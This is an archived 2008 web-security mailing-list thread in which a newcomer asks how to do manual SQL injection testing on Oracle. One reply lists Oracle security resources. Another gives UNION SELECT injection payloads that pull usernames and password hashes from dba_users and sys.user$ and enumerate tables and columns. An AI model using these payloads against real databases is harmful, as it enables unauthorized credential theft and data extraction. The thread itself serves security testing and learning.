[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [WEB SECURITY] Query: Manual sql injection testing in oracle databse
- From: goldshlager <goldshlager19@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] Query: Manual sql injection testing in oracle databse
- Date: Wed, 16 Jan 2008 21:57:28 +0200
------=_Part_30742_5922372.1200513448936
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
union select username,password from dba_users
union select table_name from all_tables
union select username,password from sys.user$
union select column_name from ALL_TAB_COLUMNS where table_name='tablename'
etc.....
On 1/16/08, Elad Shapira <eladexposed@gmail.com> wrote:
>
> Hello,
>
> regarding Oracle and database security you can use the following links:
>
> http://www.petefinnigan.com/
>
> http://www.red-database-security.com/
>
> http://ferruh.mavituna.com/makale/oracle-sql-injection-cheat-sheet/
>
> www.sqlsecurity.com
>
> http://www.imperva.com/application_defense_center/scuba/scubaugl.asp
>
> there're more... goodluck!
>
> Kind Regards,
>
> Elad Shapira ("Zest" )
>
> "Security, however, is an art, not a science." - RFC 3631
>
> On Jan 16, 2008 6:54 PM, surendra kumar <surendra_anil@yahoo.com> wrote:
>
> > Hi Guys,
> >
> > Anybody guide me, How to Manual sql injection testing in oracle databse
> > Step by step because i am freshers in this database auditing.
> >
> > Regards
> > surendra
> >
> > ------------------------------
> > Never miss a thing. Make Yahoo your homepage.<http://us.rd.yahoo.com/evt=51438/*http://www.yahoo.com/r/hs>
> >
> >
>
------=_Part_30742_5922372.1200513448936
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<div>union select username,password from dba_users</div>
<div>union select table_name from all_tables</div>
<div>union select username,password from sys.user<font size="2">$</font></div>
<div>union select column_name from ALL_TAB_COLUMNS where table_name='tablename'</div>
<div> </div>
<div>etc.....</div>
<div><br><br> </div>
<div><span class="gmail_quote">On 1/16/08, <b class="gmail_sendername">Elad Shapira</b> <<a href="mailto:eladexposed@gmail.com";>eladexposed@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>regarding Oracle and database security you can use the following links:<br><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.petefinnigan.com/"; target="_blank">
http://www.petefinnigan.com/</a><br><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.red-database-security.com/"; target="_blank">http://www.red-database-security.com/ </a><br><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://ferruh.mavituna.com/makale/oracle-sql-injection-cheat-sheet/"; target="_blank">
http://ferruh.mavituna.com/makale/oracle-sql-injection-cheat-sheet/</a><br><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.sqlsecurity.com/"; target="_blank">www.sqlsecurity.com </a><br><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.imperva.com/application_defense_center/scuba/scubaugl.asp"; target="_blank">
http://www.imperva.com/application_defense_center/scuba/scubaugl.asp</a><br><br>there're more... goodluck!<br><br>Kind Regards, <br><br>Elad Shapira ("Zest" )<br><br>"Security, however, is an art, not a science." - RFC 3631
<div><span class="e" id="q_11783bc3969d2094_1"><br><br>
<div class="gmail_quote">On Jan 16, 2008 6:54 PM, surendra kumar <<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:surendra_anil@yahoo.com"; target="_blank">surendra_anil@yahoo.com</a>> wrote:<br>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">
<div>Hi Guys,</div>
<div> </div>
<div>Anybody guide me, How to Manual sql injection testing in oracle databse</div>
<div>Step by step because i am freshers in this database auditing.</div>
<div> </div>
<div>Regards </div><font color="#888888">
<div>surendra</div></font>
<div>
<p>
<hr size="1">
Never miss a thing. <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://us.rd.yahoo.com/evt=51438/*http://www.yahoo.com/r/hs"; target="_blank">Make Yahoo your homepage.</a>
<p></p>
<p></p></p></div></blockquote></div><br></span></div></blockquote></div><br>
------=_Part_30742_5922372.1200513448936--
Brought to you by http://www.webappsec.org
Search this site
|